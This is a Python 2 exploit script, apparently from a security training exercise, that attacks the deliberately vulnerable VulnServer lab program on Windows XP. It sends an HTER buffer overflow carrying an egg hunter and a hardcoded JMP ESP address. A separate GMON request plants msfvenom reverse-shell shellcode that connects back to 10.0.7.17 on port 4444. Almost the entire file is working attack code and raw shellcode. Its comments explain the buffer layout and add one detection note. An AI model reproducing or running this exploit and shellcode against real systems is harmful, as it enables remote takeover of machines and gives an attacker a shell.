#!/usr/bin/python
# Title : VulnServer EIP Overflow in HTER + Egg in GMON
# OS : Windows XP Pro SP3 x86 English
# Name : Jonathan "Chops" Crosby
# Email : me@securitychops.com
# Twitter : @securitychops
# Website : https://securitychops.com
import socket
import sys
import time
# msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.0.7.17 LPORT=4444 -f c -b '\x00'
# Stage 2, delivered by the GMON request further down: the 8-byte egg marker
# "T00WT00W" (the 4-byte tag twice; this is the string the egg hunter in this
# file searches memory for), a 4-byte NOP (0x90) sled, then the raw bytes
# emitted by the msfvenom command above (windows/shell_reverse_tcp with 0x00
# excluded).  The shell bytes come to 341 (22 lines of 15 + 11), so
# len(revshell) == 353 -- the value subtracted from the HTER filler below.
# Python 2: a str literal is already a byte string, so this goes on the wire
# exactly as written.
revshell = (
# our egg
"T00WT00W"
# baby nopsled for decode if needed
"\x90\x90\x90\x90"
# our reverse shell
"\xbf\xaf\x1c\x0d\x7d\xd9\xe8\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"
"\x4f\x31\x7d\x14\x83\xc5\x04\x03\x7d\x10\x4d\xe9\xf1\x95\x18"
"\x12\x0a\x66\x7a\x9a\xef\x57\xa8\xf8\x64\xc5\x7c\x8a\x29\xe6"
"\xf7\xde\xd9\x7d\x75\xf7\xee\x36\x33\x21\xc0\xc7\xf2\xed\x8e"
"\x04\x95\x91\xcc\x58\x75\xab\x1e\xad\x74\xec\x43\x5e\x24\xa5"
"\x08\xcd\xd8\xc2\x4d\xce\xd9\x04\xda\x6e\xa1\x21\x1d\x1a\x1b"
"\x2b\x4e\xb3\x10\x63\x76\xbf\x7e\x54\x87\x6c\x9d\xa8\xce\x19"
"\x55\x5a\xd1\xcb\xa4\xa3\xe3\x33\x6a\x9a\xcb\xb9\x73\xda\xec"
"\x21\x06\x10\x0f\xdf\x10\xe3\x6d\x3b\x95\xf6\xd6\xc8\x0d\xd3"
"\xe7\x1d\xcb\x90\xe4\xea\x98\xff\xe8\xed\x4d\x74\x14\x65\x70"
"\x5b\x9c\x3d\x56\x7f\xc4\xe6\xf7\x26\xa0\x49\x08\x38\x0c\x35"
"\xac\x32\xbf\x22\xd6\x18\xa8\x87\xe4\xa2\x28\x80\x7f\xd0\x1a"
"\x0f\x2b\x7e\x17\xd8\xf5\x79\x58\xf3\x41\x15\xa7\xfc\xb1\x3f"
"\x6c\xa8\xe1\x57\x45\xd1\x6a\xa8\x6a\x04\x3c\xf8\xc4\xf7\xfc"
"\xa8\xa4\xa7\x94\xa2\x2a\x97\x84\xcc\xe0\xae\x83\x5b\x01\xb1"
"\x0c\x8d\x7d\xb3\x12\xbc\x21\x3a\xf4\xd4\xc9\x6a\xaf\x40\x73"
"\x37\x3b\xf0\x7c\xed\xab\x91\xef\x6a\x2b\xdf\x13\x25\x7c\x88"
"\xe2\x3c\xe8\x24\x5c\x97\x0e\xb5\x38\xd0\x8a\x62\xf9\xdf\x13"
"\xe6\x45\xc4\x03\x3e\x45\x40\x77\xee\x10\x1e\x21\x48\xcb\xd0"
"\x9b\x02\xa0\xba\x4b\xd2\x8a\x7c\x0d\xdb\xc6\x0a\xf1\x6a\xbf"
"\x4a\x0e\x42\x57\x5b\x77\xbe\xc7\xa4\xa2\x7a\xf7\xee\xee\x2b"
"\x90\xb6\x7b\x6e\xfd\x48\x56\xad\xf8\xca\x52\x4e\xff\xd3\x17"
"\x4b\xbb\x53\xc4\x21\xd4\x31\xea\x96\xd5\x13"
)
# IP and Port for VulnServer
# (RFC 1918 lab address; TCP 6666 -- both connections below use this pair)
host = '192.168.31.132'
port = 6666
# egg hunter to search for T00WT00W
# Given as ASCII hex text rather than raw bytes: 70 hex characters (35 bytes
# of hunter) plus the single leading "0" the author uses for alignment, so
# len(egg_hunter) == 71.  That length feeds the 141-character budget in the
# HTER payload below.  How the server turns this text back into bytes is not
# shown in this file; see the author's "backwards" notes on the HTER payload.
egg_hunter = (
# need an extra 0 to push the instructions
# into the correct place
"0"
# since this exploit is using literal
# alphanumeric values this is the literal
# egg hunter in alphanumeric
"6681caff0f425231db43435358cd2e3c055a74ecb85430305789d7af75e7af75e4ffe7"
)
# Stage 1: the HTER request.  Every piece after "HTER " is hex *text*
# ("09", "03125062", "9090EB80"), not raw bytes; the author's "backwards"
# comments and the byte-reversed EIP value suggest the server re-decodes the
# text into bytes, which is presumably why the egg hunter above is also hex.
# starting off the payload with HTER
payload = "HTER "
# nops backwards
# 950 x "09" = 1900 characters; "09" is "90" (x86 NOP) written backwards
payload += "09" * 950
# egg hunter
payload += egg_hunter
# A's cause it dosent matter here
# pad so egg_hunter + filler is always exactly 141 characters, keeping the
# EIP field below at a fixed position in the request
payload += "A" * (141 - len(egg_hunter))
# JMP ESP is 62501203
# 0x62501203 as little-endian byte pairs ("03 12 50 62").  A fixed address,
# so the script is tied to the build it was developed against (header: XP SP3)
eip_jmp_esp = "03125062"
payload += eip_jmp_esp
# everything is backwards!
# presumably two NOPs and a short jump (EB) in the same backwards encoding as
# the sled -- the exact decoded order is not verifiable from this file
payload += "9090EB80"
# filler up to the total the author settled on.  len(revshell) is subtracted
# here even though the shell bytes travel in the GMON request, not this one:
# net effect is 3055 - 8 - len(revshell) - 8 A's after the EIP field.
# Whether that exact total matters to the crash is not shown here.
payload += "A" * (3055 - len(eip_jmp_esp) - len(revshell) - 8)
# newline terminates the command
payload += "\x0a"
# Delivery: two separate TCP connections to the same host/port.
# 1) GMON carries revshell (egg marker + shell bytes) so the server holds a
#    copy of it in memory; the author notes this request returns cleanly.
# 2) after a 2 s pause, HTER carries the overflow payload built above, whose
#    egg hunter is meant to find the T00WT00W marker planted in step 1.
# Python 2 semantics throughout: `print` is a statement and str literals are
# byte strings, so this does not run unchanged under Python 3.
# Detection note: each connection sends exactly one command with a very large
# argument -- GMON with ~350 bytes of mostly non-printable data, HTER with
# ~4.7 KB of hex text -- so per-command argument-length monitoring on this
# service is one place this pattern would stand out.
# this will get our egg/revshell into memory without errors...
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
# whatever the server sends on connect
print s.recv(4096)
egg = "GMON "
egg += revshell
egg += "\x0a"
s.send(egg)
print s.recv(4096)
s.close()
# sleep for a few seconds
time.sleep(2)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(4096)
s.send(payload)
# this second socket is never closed; harmless in a one-shot script, a leak
# in anything longer-lived
print s.recv(4096)